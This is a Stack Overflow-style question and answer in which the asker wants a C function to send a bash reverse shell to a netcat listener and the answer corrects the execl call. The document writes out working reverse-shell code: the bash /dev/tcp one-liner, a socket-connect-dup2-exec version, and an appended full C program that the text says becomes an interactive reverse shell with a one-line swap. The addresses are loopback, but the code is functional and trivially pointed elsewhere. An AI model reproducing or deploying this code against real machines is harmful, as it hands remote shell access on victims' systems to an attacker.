Question

So I can't seem to figure out what's going on. Every time this function executes, it opens a shell within my current application. It's supposed to be sending a shell to the listening netcat.

I figured the solution would be forking, but I'm getting the same results.

#include <unistd.h>

void cmd_bashcb(char *ip, int port) {

    if (port > 0 && port < 65536) {

        if (fork() == 0) {
            //char *args[] = {"/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", NULL };
            //execv("/bin/bash", args);
            // the whole command line is handed over as one string here
            execl("/bin/bash", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", NULL);
        }
    }
}

Really one of those issues I can't seem to figure out.

If I execute this on the CLI, it works like a charm: bash -i >& /dev/tcp/IP/PORT 0>&1

Any ideas, guys?


Solution

The first argument to execl() is the pathname of the executable. The second argument is the argv[0]. You are telling bash that its name is "/bin/bash -i >&…", and since there are no other arguments, it runs as a regular interactive shell connected to the standard I/O channels of the process your code is in.

You need:

execl("/bin/bash", "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", (char *)0);

This effectively invokes:

/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

You need the extra level of shell to make the shell handle the I/O redirection. You could do it yourself and save a shell invocation.

/* /dev/tcp/... is not a real device; bash handles it inside its own redirection
 * code, so open() on that path fails. From C, connect a real socket instead
 * (needs <sys/socket.h>, <netinet/in.h>, <arpa/inet.h>, <unistd.h>). */
int fd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(4444) };
inet_pton(AF_INET, "127.0.0.1", &sa.sin_addr);
if (fd < 0 || connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0)
    _exit(1);                        /* we are in the forked child: bail out */
dup2(fd, STDIN_FILENO);
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
close(fd);
execl("/bin/bash", "/bin/bash", "-i", (char *)0);
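The complete fork/connect/dup2/exec pattern from the answer, written out as an added, self-contained example that is not code from the question or the answer. It connects a real socket rather than bash's /dev/tcp pseudo-path, passes the command as its own argv entry (the fix for the question's execl call), and, so that it runs offline, stands up its own listener on an ephemeral 127.0.0.1 port in place of netcat and reads back what the child wrote. The helper names (connect_tcp, spawn_on_socket, run_over_loopback), the use of /bin/sh -c instead of an interactive bash, and the 5 second timeout are choices made for this example.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <unistd.h>

/* Connect to ip:port and return the socket, or -1 on any failure. */
static int connect_tcp(const char *ip, int port) {
    if (port <= 0 || port > 65535) return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons((uint16_t)port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Fork a child, point its stdin/stdout/stderr at the socket and exec the
 * command via "sh -c". Returns the child's pid to the parent, or -1 if fork
 * failed. argv[0] is the program name and the command is a separate
 * argument; collapsing both into argv[0] is the mistake in the question. */
static pid_t spawn_on_socket(const char *ip, int port, const char *cmd) {
    pid_t pid = fork();
    if (pid != 0) return pid;                 /* parent, or fork failure */
    int fd = connect_tcp(ip, port);
    if (fd < 0) _exit(127);
    dup2(fd, STDIN_FILENO);
    dup2(fd, STDOUT_FILENO);
    dup2(fd, STDERR_FILENO);
    if (fd > STDERR_FILENO) close(fd);
    execl("/bin/sh", "/bin/sh", "-c", cmd, (char *)0);
    _exit(127);                               /* reached only if exec fails */
}

/* Listen on an ephemeral 127.0.0.1 port (standing in for the netcat listener),
 * spawn the child against it, and collect what the child's stdout and stderr
 * deliver over the socket. Returns the byte count read into buf
 * (NUL-terminated), or -1 on error. A 5 s receive timeout keeps accept() and
 * read() from hanging if the child never connects. */
int run_over_loopback(const char *cmd, char *buf, size_t buflen) {
    struct timeval tv = { 5, 0 };
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    if (lfd < 0) return -1;
    setsockopt(lfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;                          /* kernel picks a free port */
    socklen_t len = sizeof sa;
    if (bind(lfd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(lfd, 1) < 0 ||
        getsockname(lfd, (struct sockaddr *)&sa, &len) < 0) {
        close(lfd);
        return -1;
    }
    pid_t pid = spawn_on_socket("127.0.0.1", ntohs(sa.sin_port), cmd);
    if (pid < 0) { close(lfd); return -1; }
    int cfd = accept(lfd, NULL, NULL);
    close(lfd);
    if (cfd < 0) { waitpid(pid, NULL, 0); return -1; }
    setsockopt(cfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);
    size_t total = 0;
    while (total < buflen - 1) {
        ssize_t n = read(cfd, buf + total, buflen - 1 - total);
        if (n <= 0) break;                    /* EOF once the child exits */
        total += (size_t)n;
    }
    buf[total] = '\0';
    close(cfd);
    waitpid(pid, NULL, 0);
    return (int)total;
}

int main(void) {
    char out[256];
    int n = run_over_loopback("echo hello from pid $$; echo oops >&2", out, sizeof out);
    printf("child sent %d bytes:\n%s", n, out);
    return n > 0 ? 0 : 1;
}
```

Both stdout and stderr of the child arrive on the single socket because all three standard descriptors were dup2'd onto it, which is what the `>&` and `0>&1` in the original bash one-liner achieve; swapping `"/bin/sh", "-c", cmd` for `"/bin/bash", "-i"` gives the interactive reverse shell from the answer.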
Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow